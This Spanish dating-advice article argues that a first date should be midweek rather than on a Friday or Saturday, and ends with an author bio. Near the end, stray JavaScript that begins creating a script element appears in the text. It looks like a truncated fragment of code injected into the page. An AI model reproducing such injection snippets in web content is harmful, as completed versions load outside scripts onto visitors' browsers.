¿En qué día de la semana deberías tener tu primera cita?

Es posible que, al enfrentarte a un mundo lleno de tantas y variadas opciones, te resulte confuso elegir la actividad, el horario e incluso, el día idóneo para tener esa primera cita

Pocas cosas en la vida se pueden comparar con la emoción de tener una primera cita con ese chico o chica que tanto te gusta. No hay nada como pensar y planear cómo será y se desarrollará ese momento tan esperado y especial. Te consideres o no una persona romántica, lo cierto es que, siempre desearás que esa primera salida sea verdaderamente inolvidable para ambos.

Sin embargo, hoy en día pareciera que las ideas, los lugares y los momentos para tener citas románticas fuera de lo común, se han extinguido. Es posible que, al enfrentarte a un mundo lleno de tantas y variadas opciones, te resulte confuso elegir la actividad, el horario e incluso, el día idóneo para tener esa primera cita.

No obstante, saber cuáles son algunos de los días menos adecuados para salir por primera vez con él o ella, será uno de los factores de mayor importancia para que tu cita sea verdaderamente exitosa.

Por ello, a continuación, te comparto las siguientes 6 razones por las que, esa primera cita que tanto anhelas, NUNCA debería ser un viernes o sábado.

1. Resulta poco original

Si lo que pretendes es que esa ocasión sea total y absolutamente distinta, evita elegir los días que, de manera común, la gente prefiere para tener sus citas o reuniones. Por absurdo que parezca, tener una primera cita un día martes, jueves o incluso, domingo, te permitirá realizar actividades distintas y originales, en comparación con las que realizarías un viernes o sábado.

Salir de la comodidad que te ofrecen estos dos días de la semana y arriesgarte a pasar la tarde del miércoles jugando boliche y dejando atrás el estrés del trabajo, puede ser mucho más significativo que una salida al cine de viernes por la noche.

2. Los lugares para salir estarán llenos de gente

Ahora bien, debido a que los viernes y sábados son los días de descanso para la mayoría de las personas es que, vayas a donde vayas, encontrarás los lugares repleto de gente. En razón de esto, puede ser que, más allá de disfrutar de tu cita, comiences a estresarte y a malhumorarte.

3. Pueden tener otros compromisos

En definitiva, estos días no son los más adecuados para tener una primera cita debido al riesgo que corres de que, tanto tú como la persona con la que planeas salir, tengan algún otro compromiso.

De la misma manera, al ser los días que la gente emplea para estar con sus familias o realizar sus pendientes personales, es probable que, ninguno de los dos, tengan mucho tiempo para convivir.

4. Son días donde se acepta o se extiende cualquier invitación a salir, aunque no haya un verdadero interés.

Si lo que de verdad deseas es que, esa primera cita, te ayude a descubrir si esa chica o chico que tanto te gusta tiene un interés genuino por ti, evita que sea en viernes o sábado. Esto, en razón de que en esos días resulta fácil aceptar o invitar a salir a alguien, con tal de salir de la rutina. Por supuesto, no en todos los casos aplica esto. Sin embargo, planear tu cita un martes o jueves, te permitirá percatarte que tan dispuesta está esa personita especial a pasar tiempo contigo.

5. Será difícil que conversen tranquilamente

Como te comenté en el punto dos, los viernes y sábados son días donde hay más gente de lo normal en los cines, plazas, restaurantes, teatros y demás lugares. Por eso mismo, si lo que buscas es conversar con tranquilidad con esa chica o chico, procura planear tu primera cita en cualquier otro día de la semana.

Quizás un domingo por la tarde, sea una buena opción para salir a caminar juntos y encontrar un panorama mucho más despejado e inspirador.

6. Pueden mostrarse distintos a como son de manera cotidiana

Finalmente, si deseas conocer como es cotidianamente esa persona que tanto te interesa, debes planear tu cita en un día que no sea ni viernes ni sábado. Dejar de lado la euforia de estos dos días de descanso —durante tu primera salida— te ayudará a distinguir con claridad si debe haber una segunda, tercera y demás citas románticas.

var d=document;var s=d.createElement(‘script’);

360

Promotor y gestor creativo. Creador. ciclista y lector.